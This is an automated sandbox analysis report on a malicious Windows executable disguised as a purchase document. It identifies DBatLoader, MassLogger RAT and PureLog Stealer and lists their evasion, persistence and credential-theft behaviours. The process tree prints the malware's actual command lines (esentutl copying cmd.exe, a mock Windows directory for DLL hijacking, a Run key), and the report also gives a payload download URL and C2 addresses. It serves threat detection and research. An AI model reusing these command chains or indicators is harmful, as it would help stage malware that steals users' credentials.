Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PURCHASE REQUIRED DETAILS 000487958790903403.exe

Overview

General Information

Sample name:PURCHASE REQUIRED DETAILS 000487958790903403.exe
Analysis ID:1572131
MD5:cbeea46a413d2f3d7166104d79788062
SHA1:6bca74ac8ef6b5a5377dbd0cac8ce783dda2b080
SHA256:5250d7820ffe465180b022c710bb170b02d1aeb8fbb4c530c5e039d4259009ef
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected MassLogger RAT
Yara detected PureLog Stealer
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates files in the system32 config directory
Creates files inside the volume driver (system volume information)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Outbound SMTP Connections
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PURCHASE REQUIRED DETAILS 000487958790903403.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe" MD5: CBEEA46A413D2F3D7166104D79788062)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7912 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 8164 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 940 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 1592 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 2528 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 2776 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 4196 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 6896 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 7644 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 7948 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ymafvvdS.pif (PID: 7996 cmdline: C:\Users\Public\Libraries\ymafvvdS.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • armsvc.exe (PID: 8124 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: BD3B960B1EFB321AF06FE54D1D30C855)
  • alg.exe (PID: 7276 cmdline: C:\Windows\System32\alg.exe MD5: 1F7F4AE415948A1027E513F2D23B8A5B)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 3556 cmdline: C:\Windows\system32\AppVClient.exe MD5: 500275C60FCB5B035FD81A2BA2CB2073)
  • FXSSVC.exe (PID: 2876 cmdline: C:\Windows\system32\fxssvc.exe MD5: 3117CDDE7FDB0851FDBCA3E7FDB7A142)
  • elevation_service.exe (PID: 4192 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 6A2E9C13C2A578F9FC128F26D48FC3D7)
  • maintenanceservice.exe (PID: 6184 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 5AF7A965937863A10C99D5EC19A974A5)
  • msdtc.exe (PID: 6556 cmdline: C:\Windows\System32\msdtc.exe MD5: 7AE7553BA674284A076D19A633F7EFF0)
  • PerceptionSimulationService.exe (PID: 3436 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 93CC0F7EAE7D58C22855106B435E4B64)
  • perfhost.exe (PID: 5508 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: B5FDD433E07825BDB9C6B8F563B00FDE)
  • Locator.exe (PID: 7508 cmdline: C:\Windows\system32\locator.exe MD5: 979F07784823EB9149D134FBAB0B4376)
  • SensorDataService.exe (PID: 6228 cmdline: C:\Windows\System32\SensorDataService.exe MD5: 3F2AB6CB57E7A0604E4E19795A526BD3)
  • snmptrap.exe (PID: 7420 cmdline: C:\Windows\System32\snmptrap.exe MD5: 9E84CEFC497519C8483A6623FAD6ED3D)
  • Spectrum.exe (PID: 4120 cmdline: C:\Windows\system32\spectrum.exe MD5: 07D3656AD4DF3DADDEDA88F101DE735C)
  • ssh-agent.exe (PID: 7624 cmdline: C:\Windows\System32\OpenSSH\ssh-agent.exe MD5: A5F4C6CB650242AC4B9D281D7FB3AD95)
  • TieringEngineService.exe (PID: 7832 cmdline: C:\Windows\system32\TieringEngineService.exe MD5: ADFE5C8879C41AEA47D22E19AC1F0F44)
  • AgentService.exe (PID: 6980 cmdline: C:\Windows\system32\AgentService.exe MD5: 11EB7B63D45B07D2E9811E4D818A0174)
  • vds.exe (PID: 5320 cmdline: C:\Windows\System32\vds.exe MD5: 680F459932662444F71FD678EBDF4171)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://lwaziacademy.com/royal/233_Sdvvfamydeo"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1430067996.000000007F9E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 5F 88 44 24 2B 88 44 24 2F B0 80 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000000.00000003.1429580611.000000007FB90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
        00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          9.3.ymafvvdS.pif.24742da8.17.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            9.3.ymafvvdS.pif.24742da8.17.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              9.3.ymafvvdS.pif.24742da8.17.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x19948:$a1: get_encryptedPassword
              • 0x1991c:$a2: get_encryptedUsername
              • 0x199e0:$a3: get_timePasswordChanged
              • 0x198f8:$a4: get_passwordField
              • 0x1995e:$a5: set_encryptedPassword
              • 0x1972b:$a7: get_logins
              • 0x18c99:$a8: GetOutlookPasswords
              • 0x181ad:$a9: StartKeylogger
              • 0x16c07:$a10: KeyLoggerEventArgs
              • 0x16bd6:$a11: KeyLoggerEventArgsEventHandler
              • 0x197ff:$a13: _encryptedPassword
              9.3.ymafvvdS.pif.24590000.925.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
                9.3.ymafvvdS.pif.24590000.925.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  Click to see the 7 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessId: 7608, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\ymafvvdS.pif, NewProcessName: C:\Users\Public\Libraries\ymafvvdS.pif, OriginalFileName: C:\Users\Public\Libraries\ymafvvdS.pif, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe", ParentImage: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ParentProcessId: 7608, ParentProcessName: PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessCommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, ProcessId: 7996, ProcessName: ymafvvdS.pif
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Sdvvfamy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdvvfamy
                  Sigma detected: Suspicious Program Location with Network Connections
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DesusertionIp: 54.244.188.177, DesusertionIsIpv6: false, DesusertionPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\ymafvvdS.pif, Initiated: true, ProcessId: 7996, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49709
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Sdvvfamy.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessId: 7608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdvvfamy
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\ymafvvdS.pif, NewProcessName: C:\Users\Public\Libraries\ymafvvdS.pif, OriginalFileName: C:\Users\Public\Libraries\ymafvvdS.pif, ParentCommandLine: "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe", ParentImage: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe, ParentProcessId: 7608, ParentProcessName: PURCHASE REQUIRED DETAILS 000487958790903403.exe, ProcessCommandLine: C:\Users\Public\Libraries\ymafvvdS.pif, ProcessId: 7996, ProcessName: ymafvvdS.pif
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 103.20.200.105, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\Public\Libraries\ymafvvdS.pif, Initiated: true, ProcessId: 7996, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49725

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:23.409269+010020283713Unknown Traffic192.168.2.94970741.185.8.252443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:54.224970+010020516491A Network Trojan was detected192.168.2.9516001.1.1.153UDP
                  2024-12-10T07:05:56.230614+010020516491A Network Trojan was detected192.168.2.9629251.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:42.927993+010020516481A Network Trojan was detected192.168.2.9495511.1.1.153UDP
                  2024-12-10T07:05:46.083996+010020516481A Network Trojan was detected192.168.2.9641351.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:42.961779+010020181411A Network Trojan was detected18.141.10.10780192.168.2.949718TCP
                  2024-12-10T07:05:44.675082+010020181411A Network Trojan was detected54.244.188.17780192.168.2.949720TCP
                  2024-12-10T07:05:46.096205+010020181411A Network Trojan was detected44.221.84.10580192.168.2.949723TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:42.961779+010020377711A Network Trojan was detected18.141.10.10780192.168.2.949718TCP
                  2024-12-10T07:05:44.675082+010020377711A Network Trojan was detected54.244.188.17780192.168.2.949720TCP
                  2024-12-10T07:05:46.096205+010020377711A Network Trojan was detected44.221.84.10580192.168.2.949723TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:36.654151+010028032742Potentially Bad Traffic192.168.2.949710158.101.44.24280TCP
                  2024-12-10T07:05:45.913984+010028032742Potentially Bad Traffic192.168.2.949710158.101.44.24280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-10T07:05:36.062119+010028508511Malware Command and Control Activity Detected192.168.2.94970954.244.188.17780TCP
                  2024-12-10T07:06:43.512348+010028508511Malware Command and Control Activity Detected192.168.2.94973782.112.184.19780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                  Found malware configuration
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/royal/233_Sdvvfamydeo"]}
                  Multi AV Scanner detection for submitted file
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeReversingLabs: Detection: 36%
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeVirustotal: Detection: 43%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                  Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.9:49712 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.9:49707 version: TLS 1.2
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: ymafvvdS.pif, 00000009.00000003.2241637142.00000000247F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: ymafvvdS.pif, 00000009.00000003.2312451071.0000000024870000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2322898064.00000000247E0000.00000004.00001000.00020000.00000000.sdmp, ymafvvdS.pif, 00000009.00000003.2313769391.0000000024880000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: ymafvvdS.pif, 00000009.00000003.1580591877.0000000026CC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdb source: ymafvvdS.pif, 00000009.00000003.1700911877.000000002A530000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: ymafvvdS.pif, 00000009.00000003.1940616402.0000000026980000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: ymafvvdS.pif, 00000009.00000003.1787107994.0000000026BA0000.00000004.00001000.00020000.00000000.sdmp
